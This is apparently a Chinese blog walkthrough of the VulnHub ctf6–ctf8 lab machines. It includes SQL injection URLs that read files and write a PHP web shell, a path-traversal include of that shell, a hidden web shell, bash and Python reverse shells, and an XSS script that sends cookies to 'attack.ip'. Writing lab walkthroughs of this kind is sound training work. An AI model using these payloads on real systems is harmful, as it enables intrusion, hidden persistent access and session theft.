渗透测试系列 — VulnHub–ctf6.7.8

正文:

ctf6:

1.
http://ip/?id=  存在普通注入漏洞,sqlmap拿到管理员账号密码,发现没有什么用;os-shell也是无法写shell。
2.
ok,看到作者是用http://192.168.244.171/?id=1%20%20union%20select%201,load_file(%27/var/www/html/index.php%27),3,4,5,6,7%20from%20dual  得到文件内容
http://192.168.244.171/?id=1%20%20union%20select%20NULL,NULL,NULL,NULL,NULL,NULL,%27%3C?php%20echo%20system($_POST[\%27cmd\%27]);?%3E%27%20into%20outfile%20%27/tmp/abc.php%27  写入文件(注意\转义,不然写不进去)
测试写入成功(/tmp下,一般权限较大,可写,学到可操作)
192.168.244.171/action/login.php?action=../../../../tmp/abc.php %00  post cmd=ls /tmp 读取成功(这个怎么拿到的呢,一是测试嘛,这种读取的都可以测试下,= 看是否存在目录遍历,二是工具扫嘛)
3.然后利用cmd,写入一句话到www/html目录下
再cmd=echo “<?php echo system(\$_GET[‘cmd’]);?>” > /var/www/html/.apache_tmp.php   发现写入进去,为什么写这个呢,.一般ls是不出来的,ls -la出来。
http://192.168.244.171/.apache_tmp.php?cmd=pwd    执行成功
4.
写入一句话,菜刀连接;写入大马,写入php反弹,(这两个文件中的引号最好都转义);执行bash反弹,python反弹等得到用户权限。
一句话坑定可以写的,毕竟前面我们才写了文件。
cmd=echo “bash -i >& /dev/tcp/192.168.244.166/5555 0>&1” | bash  (试了下,bash没有反弹到)
cmd=python -c ‘import socket,subprocess,os;s = socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((”192.168.244.166″,1234));os.dup2(s.fileno() ,0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); P = subprocess.call([“/ bin / sh”,” -i”]);’    (试了下,python反弹shell也没有反应)
5.
nikto  w3af是扫不出来明显的可利用漏洞,kali自带paros(paros在kali上用到也有点问题,windows下载了个也反应不过来。。)

ctf7:

10多处存在xss,多处存在sql盲注,跑出来,ssh上去提权。

ctf8:

(下载的文件少了东西,无法实验,仅从网上的资源进行记录)
xss漏洞
1.仅限于本地实验
tail -f /var/log/apache2/access.log
<script>
var=req=new XMLHttpRequest();
var url=’http://attack.ip/’+document.cookie;
req.open(“GET”,url);
req.send();
</script>
登陆一下,再次tail -f /var/log/apache2/access.log 发现多了cookie
2.利用xss平台
 
2018.7.29

发表评论

电子邮件地址不会被公开。 必填项已用*标注